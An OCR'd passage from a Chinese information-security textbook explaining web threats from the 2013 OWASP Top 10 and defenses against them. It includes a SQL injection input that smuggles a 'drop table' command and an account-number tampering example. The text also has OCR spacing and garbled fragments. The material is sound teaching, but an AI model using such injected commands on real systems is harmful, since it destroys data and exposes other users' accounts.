认证 中 心 按照 中 国信 息 安全 认证 体系 的 监督 要 求 ， 综 合 对 配置 管理 变更 的 安全 影响 
分 析 和 现场 监督 检查 报告 ， 形 成 认证 监督 报告 ， 作 出 信息 系统 的 安全 性 是 否 持续 有 效 的 
认证 监督 决定 。 

信息 系统 主管 部 门 代表 将 从 信息 系统 所 有 者 或 认证 中 心 获 得 最 终 的 信息 系统 安全 
认证 监督 报告 ， 决 定 批准 更 新 信息 系统 的 安全 计划 及 安全 方案 ， 从 而 确保 信息 系统 面临 
的 安全 风险 的 持续 可 接受 度 。 

认证 监督 将 一 直 持 续 到 信息 系统 的 安全 性 需要 重新 认可 时 为 止 。 信 息 系统 的 重新 安 
全 认可 通常 是 由 于 系统 中 发 生 了 某 些 特定 的 重大 变化 ， 或 是 根据 信息 系统 的 安全 性 认可 
程序 规定 的 重新 认证 年 限 要 求 来 定期 进行 。 
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8.1 Web 安全 的 需求 分 析 与 基本 设计 


8.1.1 Web 安全 威胁 


8.11.1 概念 

在 Intemet 技术 飞速 演变 、 电 子 商 务 攻 勃发 展 的 今天 , 开发 的 很 多 应 用 程序 都 是 Web 
应 用 程序 ， 随 着 微 信 、 微 博 、 网 上 银行 等 一 系列 的 新 型 的 Web 应 用 程序 的 诞生 ，Web 应 
用 越 来 越 广泛 。 然 而 Web 应 用 程序 及 Web 站 点 往往 很 容易 遭受 各 种 各 样 的 入 侵 , Web 数 
据 在 网 络 传输 过 程 中 也 很 容易 被 窃取 或 盗用 。 如 何 能 够 使 Web 及 数据 传输 更 加 安全 ,就 
显得 尤为 重要 。 

如 今 ，Web 业务 平台 已 经 在 电子 商务 、 企 业 信息 化 中 得 到 广泛 应 用 ， 很 多 企业 都 将 
应 用 架设 在 Web 平台 上 ，Web 业务 的 迅速 发 展 也 引起 了 黑客 们 的 强烈 关注 , 他 们 将 注意 
力 从 以 往 对 传统 网 络 服务 器 的 攻击 逐步 转移 到 了 对 Web 业务 的 攻击 上 。 黑 客 利 用 网 站 
操作 系统 的 漏洞 和 Web 服务 程序 的 SQL 注入 漏洞 等 得 到 Web 服务 器 的 控制 权限 ， 轻 则 
自 改 网 页 内 容 ， 重 则 窃取 重要 内 部 数据 ， 更 为 严重 的 则 是 在 网 页 中 植 入 恶意 代码 ， 使 得 
网 站 访问 者 受到 侵害 。 

Web 威胁 的 目标 定位 有 多 个 维度 : 有 个 人 、 公 司 、 还 有 某 种 行业 ， 都 有 其 考虑 ， 甚 
至 国家 、 地 区 、 性 别 、 种 族 、 宗 教 等 也 成 为 发 动 攻击 的 原因 或 动机 。 

攻击 还 会 采用 多 种 形态 ， 甚 至 是 复合 形态 ， 比 如 病毒 、 蠕 虫 、 特 洛 伊 、 间 谍 软 件 、 
僵尸 、 网 络 钓鱼 电子 邮件 、 漏 洞 利用 、 下 载 程序 、 社 会 工程 、rootkjt、 黑 客 ， 结 果 都 可 
以 导致 用 户 信息 受到 危害 ， 或 者 导致 用 户 所 需 的 服务 被 拒绝 和 劫持 。 

从 其 来 源 说 Web 威胁 还 可 以 分 为 内 部 攻击 和 外 部 攻击 两 类 。 前 者 主要 来 自信 任 网 
络 ， 可 能 是 用 户 执行 了 未 授权 访问 或 是 无 意 中 定制 了 恶意 攻击 ; 后 者 主要 是 由 于 网 络 漏 
洞 被 利用 或 者 用 户 受 到 恶意 程序 制定 者 的 专 一 攻击 。 
8.1.1.2 分 类 

国际 权威 机 构 Forrester 的 统计 数据 表明 ，67% 的 攻击 是 通过 应 用 层 的 攻击 。 即 是 ， 
最 简单 的 网 页 浏览 也 有 可 能 造成 威胁 ， 比 如 ， 单 击 含 有 病毒 的 网 址 、 隐 秘 的 图 片 ,， 或 者 ， 
单 击 下 载 某 些 免 费 的 软件 、 文 件 等 ， 由 于 下 载 的 软件 或 者 文件 中 含有 未 知 的 恶意 代码 ， 
当 用 户 在 运行 程序 或 者 打开 这 些 文件 时 ， 恶 意 代 码 被 启动 就 有 可 能 造成 用 户 个 人 信息 丢 
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失 ， 甚 至 后 台 服 务 器 系统 出 现 漏洞 给 恶意 攻击 者 窃取 信息 提供 方便 的 大 门 。 

开源 Web 应 用 安全 项 目 (OWASP) 是 一 个 开放 的 社区 组 织 。 专 注 于 讨论 应 用 程序 ， 
代码 开发 的 威胁 讨论 。 TOP 10 项 目的 目标 是 通过 找 出 企业 组 织 所 面临 的 最 严重 的 十 大 风 
险 来 提高 人 们 对 应 用 程序 安全 的 关注 度 。 其 中 罗列 的 是 十 大 最 有 可 能 发 生 的 应 用 漏洞 ， 
并 不 是 具体 的 某 一 种 攻击 行为 ， 了 解 它们 可 以 更 好 地 规避 Web 应 用 安全 风险 。 以 下 是 
2013 年 版 本 的 OWASP TOP 10。 

1. 注入 

(1) 应 用 描述 

随 着 Web 技术 的 发 展 ， 协 助 程序 员 来 开发 应 用 程序 的 Web 应 用 程序 也 是 越 来 越 多 ， 
这 样 程序 员 不 需要 太 强 的 代码 能 力 ， 就 可 以 很 轻松 地 制作 出 功能 和 页 面 都 比较 完美 的 动 
态 网 站 、 数 据 库 。 由 于 程序 员 的 编码 能 力 不 一 样 ， 很 多 程序 员 在 开发 程序 的 时 候 存在 漏 
洞 ， 这 就 给 攻击 者 提供 了 便利 的 条 件 。 系 统 在 对 用 户 输入 的 参数 不 进行 检查 和 过 滤 ， 不 
对 用 户 输 入 数据 的 合法 性 进行 判断 ， 或 者 程序 本 身 的 变量 处 理 不 当 ， 使 得 应 用 程序 存在 
安全 隐患 。 

攻击 者 通过 在 应 用 程序 预先 定义 好 的 查询 语句 结尾 加 上 额外 的 查询 语句 元 素 ， 欺 骗 
数据 库 服 务 器 执行 非 授权 的 任意 查询 。 当 应 用 程序 视 同 输入 内 容 来 构造 动态 查询 语句 以 
访问 数据 库 时 ， 会 发 生 注入 攻击 。 

注入 攻击 漏洞 ， 例 如 SQL, OS 以 及 LDAP 注入 。 这些 攻击 发 生 在 当 不 可 信 的 数据 
作为 命令 或 者 查询 语句 的 一 部 分 ， 被 发 送 给 解释 器 的 时 候 。 攻 击 者 发 送 的 恶意 数据 可 以 
欺骗 解释 器 ， 以 执行 计划 外 的 命令 或 者 在 未 被 恰当 授权 时 访问 数据 。 

注入 漏洞 主要 是 提交 数据 库 查 询 请 求 的 攻击 ， 与 正常 的 用 户 访 问 没 有 什么 区 别 ， 所 
以 能 够 轻易 地 绕 过 防火 墙 直接 访问 数据 库 ， 甚 至 获得 数据 库 所 在 服务 器 的 访问 权限 。 这 
就 导致 了 任何 能 够 向 系统 发 送 不 信任 数据 的 人 ， 包 括 外 部 用 户 和 管理 员 ， 都 可 能 通过 注 
入 漏洞 对 系统 进行 访问 ， 从 而 获得 想 要 的 数据 。 

(2) 可 利用 性 

攻击 者 利用 有 针对 性 的 解释 器 语法 发 送 简单 的 、 基 于 文本 样式 的 攻击 。 几 乎 任何 数 
据 源 都 能 成 为 注入 的 载体 ， 包 括 内 部 来 源 。 

(3) 普遍 性 和 可 检测 性 

注入 漏洞 发 生 在 应 用 程序 将 不 可 信 的 数据 发 送 到 解释 器 时 。 注 入 漏洞 十 分 普遍 ， 尤 
其 是 在 遗留 代码 中 。 通 常 能 在 SQL 查询 语句 、LDAP AWHA Xpath 查询 语句 、OS 
命令 等 中 找到 。 其 很 容易 通过 查询 代码 发 现 ， 但 是 不 容易 通过 测试 代码 发 现 。 

(4) 影响 

注入 能 导致 数据 丢失 或 数据 破坏 。 未 经 授权 状况 下 操作 数据 库 中 的 数据 ， 比 如 管理 
员 口 令 ， 用 户口 令 等 信息 ; 恶意 算 改 数据 库 内 容 ， 导 入 虚假 错误 信息 ; 私自 添加 系统 账 
号 后 者 是 数据 库 使 用 账号 ， 使 得 没有 授权 的 用 户 拥 有 授权 的 权限 。 
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缺乏 可 审计 性 或 是 拒绝 服务 。 在 网 页 上 植 入 木马 、 病 毒 ， 随 意 挂 广告 等 造成 网 络 通 
道 堵塞 。 

注入 漏洞 优势 甚至 能 导致 完全 主机 接管 。 

(5) SQL 注入 例子 

目前 常见 的 针对 数据 库 的 一 种 攻击 方式 。 在 这 种 攻击 方式 中 ， 攻 击 者 会 将 一 些 恶 意 
代码 插入 到 字符 串 中 。 然 后 通过 各 种 手段 一 一 比如 ， 在 查询 语句 的 末尾 加 上 字符 串 
将 字符 串 传 递 到 数据 库 的 实例 中 进行 分 析 和 执行 。 只 要 这 个 恶意 代码 符合 查询 语句 的 规 
则 ， 在 代码 编译 执行 的 时 候 ， 就 不 会 被 系统 发 现 。 

我 们 接触 最 多 的 注入 漏洞 就 是 SQL 注入 攻击 ， 以 SQL 注入 攻击 为 例 来 说 明 其 危害 
性 。SQL 注入 技术 在 我 国 是 从 2002 年 后 开始 大 量 出 现 ， 目 前 没有 对 SQL 注入 技术 的 标 
准 定义 ， 微 软 中 国 技术 中 心 从 以 下 两 个 方面 对 其 进行 了 描述 : 

。 脚本 注入 式 的 攻击 

。 恶意 用 户 输 入 用 来 影响 被 执行 的 SQL 脚本 

SQL 注入 就 是 攻击 者 通过 把 SQL 的 命令 插入 到 Web 表单 递交 或 输入 域名 或 页 面 请 
求 的 查询 字符 串 中 , 最 终 达到 让 后 台数 据 库 执行 恶意 SQL 命令 的 目的 , 并 根据 程序 返回 
的 结果 ， 获 得 某 些 攻 击 者 想得到 的 数据 。 

Statement: ="SELECT* FROM Users WHERE Value = "+ a_variable +" 

这 条 语句 是 一 条 很 普通 的 SQL 查询 语句 , 主要 作用 是 实现 用 户 输入 一 个 员工 编号 然 
后 查询 出 这 个 员工 的 信息 。 但 是 这 条 语句 被 改装 之 后 呢 ， 我 们 看 看 下 面 这 条 语句 

SELECT* FROM Users WHERE Value = 'SA001'; drop table c_order-- 

这 条 语句 中 的 SA001 后 面 的 分 号 表示 一 个 查询 的 结束 和 另 一 条 语句 的 开始 。c_order 
后 面 的 两 个 连 字符 ， 指 示 当 前 行 余下 的 部 分 指示 一 个 注释 ， 可 以 忽略 。 如 果 修 改 后 的 代 
码 语法 正确 ， 那 么 服务 器 将 执行 这 段 代 码 。 系 统 在 处 理 这 条 语句 的 时 候 ， 将 首先 执行 查 
询 语句 ， 查 到 用 户 编号 为 SA001 的 信息 ， 然 后 数据 将 删除 表 corder (如果 没 有 其 他 主 
键 等 相关 约束 ， 这 个 操作 就 会 成 功 )。 

2. 失效 的 身份 认证 和 会 话 管理 

应 用 描述 

身份 认证 一 般 仅 仅 用 于 登录 的 过 程 ， 用 户 需 提交 用 户 名 和 口令 ， 对 于 安全 性 要 求 更 
高 的 身份 认证 ， 有 验证 码 ， 基 于 客户 端的 证 书 ， 口 令 卡 等 等 。HTTP 本 身 是 无 状态 的 ， 
利用 会 话 管理 机 制 来 实现 连接 识别 。 当 用 户 完成 了 身份 验证 开始 访问 网 站 时 ， 不 可 能 
次 进行 网 页 的 访问 都 重新 进行 一 次 身份 验证 ， 因 此 ， 当 认证 成 功 后 ， 系 统 会 给 用 户 分 配 
一 个 令 牌 ， 每 个 令 牌 都 是 唯一 并 且 不 可 预测 的 ， 这 个 令 牌 通常 放 在 cookie 中 ， 之 后 用 户 
在 访问 网 站 中 新 的 网 页 时 ， 对 用 户 身 份 的 识别 只 需 对 这 个 授权 的 令 牌 进行 识别 。 

开发 人 员 通 常 只 关注 Web 应 用 程序 的 功能 ， 由 于 这 个 原因 ,开发 者 通常 会 建立 自 定 
义 的 认证 和 会 话 管理 方案 。 但 要 正确 实现 这 些 方案 却 很 难 ， 结 果 这 些 自 定义 的 方案 往往 
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在 退出 、 口 令 管 理 、 超 时 、 记 住 我 、 秘 密 问题 、 账 户 更 新 等 存在 漏洞 。 因 为 这 些 每 一 个 
实现 都 不 同 ， 要 找 出 这 些 漏洞 有 时 会 很 难 。 

用 户口 令 和 用 户 令 牌 是 整个 Web 应 用 最 重要 的 部 分 ， 攻 击 者 往往 会 采用 网 络 嗅 探 、 
暴力 攻击 、 社 会 工程 等 手段 来 获取 这 些 信 息 。 与 身份 认证 和 会 话 管理 相关 的 应 用 程序 功 
能 往往 得 不 到 正确 的 实现 ， 用 户口 令 或 者 用 户 令 牌 在 会 话 过 程 中 丢失 ， 这 就 导致 了 攻击 
者 破坏 口令 、 密 匙 、 会 话 令 牌 或 攻击 其 他 的 漏洞 去 冒充 其 他 用 户 的 身份 ， 就 会 造成 失效 
的 身份 认证 和 会 话 管理 。 任 何 匿 名 的 外 部 攻击 者 和 拥有 账号 的 用 户 都 可 能 试图 盗 取 其 他 
用 户 账号 。 同 样 也 会 有 内 部 人 员 为 了 掩饰 他 们 的 行为 而 这 么 做 。 


a) 可 利用 性 

攻击 者 使 用 认证 或 者 会 话 管理 功能 中 的 泄露 或 漏洞 ， 比 如 ， 暴 露 的 账号 、 口 令 等 来 
假冒 用 户 。 

(2) 影响 


这 些 漏洞 可 能 导致 部 分 甚至 全 部 账户 遭受 攻击 。 一 旦 成 功 ， 攻 击 者 能 执行 受害 用 户 
的 任何 操作 。 因 此 特权 账户 是 常见 的 攻击 对 象 。 

(3) 例子 

用 户 和 服务 器 登录 进行 身份 验证 后 ， 与 服务 器 之 间 的 会 话 没有 会 话 超时 限制 ， 这 提 
高 了 攻击 者 在 线 上 使 用 暴力 破解 用 户口 令 的 可 能 性 。 

或 者 用 户 使 用 公共 计算 机 浏览 网 站 ， 登 录 验 证 身份 之 后 ， 离 开 时 没有 退出 账户 而 是 
选择 直接 关闭 浏览 器 ， 使 得 下 一 个 用 户 使 用 相同 计算 机 浏览 相同 浏览 器 ， 可 以 看 到 上 一 
个 用 户 的 对 话 。 

3， 跨 站 脚本 (XSS) 

(1) 应 用 描述 

用 户 在 浏览 网 站 、 玩 电脑 或 者 手机 游戏 、 阅 读 电 子 邮 件 、 书 籍 时 ， 都 可 以 看 到 在 页 
面 的 边 角 处 等 地 方 会 有 动态 的 图 片 ， 小 的 字样 等 连接 。 攻 击 者 通过 在 这 种 链接 中 插入 恶 
意 代码 ， 当 用 户 不 小 心 单 击 这 样 带 有 恶意 代码 的 链接 时 ， 其 用 户 信息 就 有 可 能 被 攻击 者 
盗 取 。 攻 击 者 通常 对 链接 进行 编码 ， 以 避免 用 户 识破 恶意 代码 的 伪装 ， 怀 疑 链 接 的 合法 
性 。 网 站 在 接收 到 包含 恶意 代码 的 请 求 后 ， 会 产生 一 个 包含 恶意 代码 的 页 面 ， 这 个 页 面 
看 起 来 和 原本 的 链接 应 当 生 成 的 页 面 一 样 。 目 前 网 上 很 多 网 站 允许 用 户 发 表 包 含 HTML 
和 JavaScript 的 帖子 ， 比 如 CSDN 中 一 些 关 于 代码 讨论 的 请 求 贴 ， 假 设 攻击 者 将 恶意 代 
码 伪装 在 发 表 的 JS 帖子 中 ， 当 其 他 用 户 在 访问 该 帖子 的 时 候 ， 恶 意 脚本 就 会 执行 ， 盗 取 
浏览 该 帖子 用 户 的 信息 等 。 而 这 就 是 跨 站 脚本 攻击 ， 全 名 是 Cross Site Scripting， 原 本 应 
WE CSS, YT AUER (Cascading Style Sheet, CSS) 分 开 ， 所 以 称 为 XSS。 

XSS 允许 攻击 者 在 受害 者 的 浏览 器 上 执行 脚本 ， 从 而 劫持 用 户 会 话 、 和 危害 网 站 、 或 
者 将 用 户 转向 至 恶意 网 站 。 任 何 能 够 发 送 不 可 信 数 据 到 系统 的 人 ， 包 括 外 部 用 户 、 内 部 
用 户 和 管理 员 ， 都 可 能 发 动 XSS。 
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(2) 普遍 性 和 检测 性 

跨 站 脚本 漏洞 是 最 普遍 的 Web 应 用 安全 漏洞 。 当 应 用 程序 发 送 给 浏览 器 的 页 面 中 包 
含 用 户 提 供 的 数据 ， 而 这 些 数 据 没 有 经 过 适当 的 验证 或 者 转 义 (escape)， 就 会 导致 跨 站 
脚本 漏洞 。 有 三 种 已 知 的 跨 站 漏洞 类 型 : 存储 式 、 反 射 式 、 基 于 DOM 的 XSS. 

(3) 影响 

攻击 者 能 在 受害 者 的 浏览 器 中 执行 脚本 以 劫持 用 户 会 话 和 浏览 器 、 破 坏 网 站 、 插 入 
恶意 内 容 、 重 定向 用 户 、 盗 取 用 户 账号 、 控 制 企业 数据 、 非 法 转账 、 强 制 发 送 电子 邮件 
等 等 。 

(4) 例子 

2011 年 6 月 28 日 晚 ， 新 浪 微 博 中 出 现 了 一 次 较 大 的 XSS 攻击 事件 。 大 量 用 户 自动 
转发 诸如 :“ 郭 美美 事件 中 未 注意 到 的 一 些 细 节 ”“ 建 党 大 业 中 穿帮 地 方 ””“ 这 就 是 传 
说 中 的 神仙 着 倡 啊 ” 等 等 微 博 和 私信 ， 并 且 自 动 关注 一 名 为 hellosamy 的 用 户 。 

事件 经 过 线索 如 下 : 20:14， 开 始 有 大 量 带 V 的 认证 用 户 中 招 转发 蠕虫 ，20:30， 网 
站 的 病毒 页 面 无 法 访问 ;20:32， 新 浪 微 博 中 hellosamy 用 户 无 法 访问 ; 21:02， 新 浪 漏洞 
修补 完毕 。 

4. 不 安全 的 直接 对 象 引用 

(1) 应 用 描述 

当 开发 人 员 将 一 个 对 内 部 实现 对 象 的 引用 暴露 在 外 面 ， 使 得 原本 不 能 看 到 这 个 引用 
对 象 的 用 户 可 以 看 到 ， 例 如 ， 一 个 文件 、 目 录 ， 能 看 到 的 用 户 就 可 以 通过 这 个 暴露 出 来 
的 引用 对 象 来 猜测 其 他 信息 ， 比 如 数据 库 密 钥 、 用 户口 令 等 ， 这 样 就 会 产生 一 个 不 安全 
的 直接 对 象 引 用 。 或 者 作为 授权 的 系统 用 户 ， 攻 击 者 只 需要 修改 指向 一 个 系统 对 象 的 直 
接 引用 参数 值 ， 让 其 指向 另 一 个 无 权 的 对 象 。 

在 没有 访问 控制 检测 或 其 他 保护 时 ， 攻 击 者 会 使 用 这 些 引 用 对 象 去 访问 未 授权 数 
据 。 考 虑 系统 的 用 户 类 型 ， 是 否 有 的 用 户 只 具有 部 分 访问 权限 。 

(2) 普遍 性 和 可 检测 性 

当 生 成 Web 页 面 时 ,应 用 程序 经 常 使 用 对 象 的 实名 或 关键 字 。 而 应 用 程序 并 不 会 每 
次 都 验证 用 户 是 和 否 有 权限 访问 该 目标 对 象 ， 这 就 导致 了 不 安全 的 直接 对 象 引 用 漏洞 。 测 
试 者 能 轻易 操作 参数 值 以 检测 该 漏洞 。 代 码 分 析 能 很 快 显示 应 用 程序 是 否 进行 了 适当 的 
权限 验证 。 

(3) 影响 

这 种 漏洞 能 破坏 通过 该 参数 引用 的 所 有 数据 。 有 可 能 涉及 敏感 数据 泄露 和 不 合理 的 
访问 控制 。 

(4) 例子 

假设 一 个 比较 常见 的 服务 应 用 ， 比 如 说 网 上 银行 。 在 网 上 银行 里 面 有 用 户 的 很 多 人 敏 
感 数据 及 隐私 信息 。 假 如 我 们 在 查看 自己 的 网 上 银行 页 面 ， 选 择 查看 ID 为 1234567890 
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的 网 上 银行 账户 的 详细 信息 ， 作 为 一 个 经 过 身份 核实 的 名 为 A 的 用 户 ， 网 站 会 跳 转 出 来 
显示 自己 的 存款 账户 信息 。 我 们 可 以 发 现 ， 跳 转 出 来 的 就 是 用 户 的 账户 ， 这 是 一 个 直接 
的 引用 。 

但 是 ， 当 在 查询 账户 信息 的 时 候 ， 用 户 将 accountNumber 参数 从 1234567890 改 成 
1234567891， 会 跳 转 出 对 应 账户 用 户 B 的 存款 信息 。 

5. 安全 配置 错误 

(1) 应 用 描述 

另外 考虑 想 要 掩饰 他 们 攻击 行为 的 内 部 攻击 者 。 好 的 安全 需要 对 应 用 程序 、 框 架 、 
应 用 程序 服务 器 、Web 服务 器 、 数 据 库 服务 器 和 平台 定义 和 执行 安全 配置 。 由 于 许多 设 
署 的 默认 值 并 不 是 安全 的 ， 因 此 ， 必 须 定义 、 实 施 和 维护 这 些 设 置 。 这 包含 了 对 所 有 的 
软件 保持 及 时 地 更 新 ， 包 括 所 有 应 用 程序 的 库 文件 。 考 虑 外 部 的 匿名 攻击 者 和 拥有 这 几 
账户 的 内 部 用 户 都 可 能 会 试图 破坏 系统 。 

(2) 可 利用 性 

攻击 者 访问 默认 账户 、 未 使 用 的 网 页 、 为 安装 补丁 的 漏洞 、 未 被 保护 的 文件 和 目录 
等 ， 以 获得 对 系统 未 授权 的 访问 或 了 解 。 

(3) 普遍 性 和 可 检测 性 

安全 配置 错误 可 以 发 生 在 一 个 应 用 程序 堆栈 的 任何 层面 ， 包 括 平台 、Web 服务 器 、 
应 用 服务 器 、 数 据 库 、 框 架 和 自 定义 代码 。 开 发 人 员 和 系统 管理 员 需 共同 努力 ， 以 确保 
整个 堆栈 的 正确 配置 。 自 动 扫描 器 可 用 于 检测 未 安装 的 补丁 、 错 误 的 配置 、 默 认 账 户 的 
使 用 、 不 必要 的 服务 等 。 


(4) 影响 
这 些 漏洞 是 攻击 者 能 经 常 访问 一 些 未 授权 的 系统 数据 或 功能 。 有 时 ， 这 些 漏洞 导致 
系统 的 完全 攻破 。 


6. 敏感 信息 泄露 

许多 Web 应 用 程序 没有 正确 保护 敏感 数据 ， 如 信用 卡 ， 税 务 ID 和 身份 验证 凭据 。 
攻击 者 可 能 会 窃取 或 算 改 这 些 弱 保护 的 数据 以 进行 信用 卡 诈骗 、 身 份 窃取 , 或 其 他 犯罪 。 
敏感 数据 需 额 外 的 保护 ， 比 如 在 存放 或 在 传输 过 程 中 的 加 密 ， 以 及 在 与 浏览 器 交换 时 进 
行 特殊 的 预防 措施 。 

7. 功能 级 访问 控制 缺失 

大 多 数 Web 应 用 程序 在 UI 中 可 见 以 前 验证 功能 级 别 的 访问 权限 。 但 是 ， 应 用 程序 
需要 在 每 个 功能 被 访问 时 在 服务 器 端 执行 相同 的 访问 控制 检查 。 如 果 请 求 没有 被 验证 ， 
攻击 者 能 够 伪造 请 求 以 在 未 经 适当 授权 时 访问 功能 。 

8. 跨 站 请 求 伪造 (CSRF) 

一 个 跨 站 请 求 伪造 攻击 迫使 登录 用 户 的 浏览 器 将 伪造 的 HTTP 请 求 ， 包 括 该 用 户 的 
会 话 cookie 和 其 他 认证 信息 ， 发 送 到 一 个 存在 漏洞 的 Web 应 用 程序 。 这 就 允许 了 攻击 


H: 


二 so 


信息 安全 工程 师 教 程 


者 人 迫使 用 户 浏览 器 向 存在 漏洞 的 应 用 程序 发 送 请 求 ， 而 这 些 请 求 会 被 应 用 程序 认为 是 用 
户 的 合法 请 求 。 

9. 使 用 更 含有 已 知 漏洞 的 组 件 

组 件 ， 比 如 : 库 文件 、 框 架 和 其 他 软件 模块 ， 儿 乎 总 是 以 全 部 的 权限 运行 。 如 果 一 
个 带 有 漏洞 的 组 件 被 利用 ， 这 种 攻击 可 以 造成 更 为 严重 的 数据 丢失 或 服务 器 接管 。 应 用 
程序 使 用 带 有 已 知 漏洞 的 组 件 会 破坏 应 用 程序 防御 系统 ， 并 使 一 系列 可 能 的 攻击 和 影响 
成 为 可 能 。 

10. 未 验证 的 重 定向 和 转发 

Web 应 用 程序 经 常 将 用 户 重 定向 和 转发 到 其 他 网 页 和 网 站 ， 并 且 利用 不 可 信 的 数据 
去 判定 目的 页 面 。 如 果 没有 得 到 适当 验证 ， 攻 击 者 可 以 重 定向 受害 用 户 到 钓鱼 软件 或 恶 
意 网 站 ， 或 者 使 用 转发 去 访问 未 授权 的 页 面 。 


8.1.2 Web 安全 威胁 防护 技术 


8.1.2.1 注入 漏洞 
SQL 注入 的 特点 : 
。 广泛 性 。SQL 注入 攻击 可 以 跨越 Windows、UNIX、Linux 等 各 种 操作 系统 进行 攻 
击 ， 其 攻击 目标 非常 广泛 ， 而 且 在 目前 看 来 Web 应 用 程序 应 用 广泛 ,它们 存在 的 
漏洞 也 大 都 具有 相似 性 。 

。 隐蔽 性 .SQL 注入 通过 正常 的 端口 访问 , 通过 端口 的 数据 都 是 被 防火 墙 所 许可 的 ， 
因此 防火 墙 是 不 会 对 SQL 注入 攻击 进行 拦截 ， 而 系统 对 用 户 输入 的 参数 不 进行 
检查 和 过 滤 ， 不 对 用 户 输入 数据 的 合法 性 进行 判断 ， 使 得 攻击 者 可 以 顺利 地 访问 
攻击 时 间 短 。SQL 注入 可 在 短 短 几 秒 到 几 分 钟 内 进行 一 次 数据 库 的 访问 ,在 访问 
的 过 程 中 ,数据 窃取 ,， 植 入 木马 ， 对 整个 数据 库 或 是 Web 服务 器 进行 控制 都 是 可 
以 的 。 

。 危害 大 。 目 前 大 多 的 办 公 、 通 信 、 商 务 都 是 基于 Web 服务 的 应 用 程序 。 可 以 想象 

一 旦 遭 到 攻击 后 果 的 严重 性 。 另 一 方面 就 是 关于 个 人 信息 的 窃取 ， 攻 击 者 侵入 数 
据 库 窃取 数据 ， 伪 造 权 限 等 等 。 

从 SQL 注入 攻击 的 例子 可 以 看 出 漏洞 攻击 的 危害 性 很 大 , 我 们 可 以 从 以 下 几 个 方面 
来 避免 漏洞 攻击 : 

。 常 使 用 自 带 的 安全 的 API， 完 全 避免 使 用 解释 器 或 提供 参数 化 界面 的 API。 用 户 

的 输入 不 能 够 直接 嵌入 到 查询 语句 中 ， 输 入 内 容 应 该 经 过 过 滤 ， 或 者 使 用 参数 化 
的 语句 来 传递 用 户 输入 的 变量 .但 要 注意 有 些 参 数 化 的 API 比如 存储 过 程 (stored 
procedures)， 如 果 使 用 不 当 ， 仍 然 可 以 引入 注入 漏洞 。 

。 如 果 没 法 使 用 一 个 参数 化 的 API， 那 么 你 应 该 使 用 解释 器 具体 的 escape 语法 来 避 


第 8 章 应 用 安全 工程 


免 特 殊 字 符 。 比 如 ， 分 号 分 隔 符 ， 它 表明 一 条 语句 的 结束 和 另 一 条 语句 的 开始 ， 
是 注入 式 攻击 的 主要 帮凶 。 注释 分 隔 符 , 注释 掉 该 语句 执行 位 置 后 面 的 所 有 语句 。 
但 由 于 很 多 应 用 在 输入 中 需要 特殊 字符 ， 这 一 方法 不 是 完整 的 防护 方法 。 

。 加 强 对 用 户 输入 的 验证 。 使 用 正面 的 或 “ 白 名 单 ” 中 的 具有 恰当 的 规范 化 的 输入 
验证 方法 会 有 助 于 防止 注入 攻击 。 拒 绝 包含 二 进 制 数据 、 转 义 序列 和 注释 字符 的 
输入 内 容 ， 可 以 防止 脚本 注入 、 菜 些 缓冲 区 溢出 攻击 。 

8.1.2.2 ”如 何 防止 失效 的 身份 认证 和 会 话 管理 

开发 人 员 自 定义 的 方案 存在 的 漏洞 例子 : 用 户 更 改口 令 之 前 不 验证 用 户 ， 而 是 依靠 
会 话 的 下 地址; 没有 会 话 超时 限制 ,提高 了 暴力 破解 的 概率 , 或 者 用 户 使 用 公共 计算 机 
浏览 网 站 ， 而 离开 时 没有 退出 选择 直接 关闭 浏览 器 ， 使 得 下 一 个 用 户 使 用 相同 的 浏览 器 
可 以 看 到 上 一 个 用 户 的 对 话 ， 用 户 自 己 忘 记 口令 后 ， 口 令 找 回 功能 过 于 简单 ;“ 记 住 我 ” 
这 样 的 指令 ， 会 造成 不 是 真正 的 用 户 在 登录 网 站 认证 时 ， 直 接 使 用 了 系统 记 住 的 用 户 账 
号 和 口令 登录 。 

对 于 失效 的 身份 认证 和 会 话 管理 的 防范 ， 我 们 可 以 从 以 下 方面 来 着 手 : 

。 一 套 单一 的 强大 的 认证 和 会 话 管理 控制 系统 。 这 套 控制 系统 应 : 满足 OWASP 的 
应 用 程序 安全 验证 标准 (ASVS) 中 认证 和 会 话 管理 中 制定 的 所 有 认证 和 会 话 管 
理 要 求 。 并 且 具 有 简单 的 开发 界面 。 

。 区 分 公共 区 域 和 受 限 区 域 。 公 共 区 域 可 以 允许 任何 用 户 进行 匿名 访问 ， 受 限 区 域 

只 能 接受 特定 经 过 身份 验证 用 户 的 访问 。 这 就 像 是 用 户 可 以 在 网 页 上 随意 的 浏 
览 ， 但 是 想 要 购买 就 要 登录 自己 的 用 户 账 号 一 样 。 公 共 区 域 和 受 限 区 域 被 用 来 区 
分 站 点 ， 不 同 的 身份 验证 和 授权 规则 就 可 以 在 不 用 的 区 域 使 用 ， 从 而 限制 SSL 的 
使 用 。 

锁定 账户 和 禁用 账户 策略 。 锁 定 账户 ， 当 账户 登录 多 次 都 失败 后 ， 可 以 在 一 段 时 
间 内 禁用 该 账户 或 是 将 该 事件 写 入 日 志 。 当 系统 受到 攻击 时 ， 可 以 使 凭证 失效 或 
是 禁用 账户 ， 这 样 可 以 避免 遭 到 进一步 的 攻击 。 

© 保护 身份 验证 Cookie. Cookie 中 的 身份 验证 被 窃取 就 意味 着 登录 被 窃取 ， 
以 通过 加 密 和 安全 的 通信 通道 来 保护 验证 Cookie。 

。 口令 、 会 话 时 限 。 口 令 的 不 变性 会 增加 攻击 者 破解 的 破解 率 ， 因 此 定期 的 改变 口 
令 可 以 很 好 的 保护 账号 的 安全 。 缩短 会 话 寿 命 可 以 降低 会 话 动 持 和 重复 攻击 的 风 
险 ， 会 话 寿命 越 短 ， 攻 击 者 在 会 话 期 间 能 够 捕捉 到 Cookie 并 用 它 访问 程序 的 时 
间 越 有 限 。 

还 有 很 多 的 方法 我 们 可 以 用 来 保护 身份 认证 ， 比 如 使 用 强 口令 作为 账户 的 口令 ， 不 

使 用 一 个 口令 来 管理 多 个 账户 ， 不 在 网 络 上 以 纯 文本 的 方式 发 送 口令 等 等 ， 都 是 用 户 可 
以 做 的 。 
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8.1.2.3 ” 跨 站 脚本 《XSS) 


防止 XSS 需要 将 不 可 信 数 据 与 动态 的 浏览 器 内 容 区 分 开 。 

。 根据 数据 将 要 置 于 的 HTML 上 下 文 (包括 主体 、 属 性 、JavaScript、CSS 或 URL) 
对 所 有 的 不 可 信 数 据 进 行 恰当 的 转 义 (escape), 或 者 是 去 掉 <>, 没有 html 标签， 
页 面 就 是 安全 的 。 

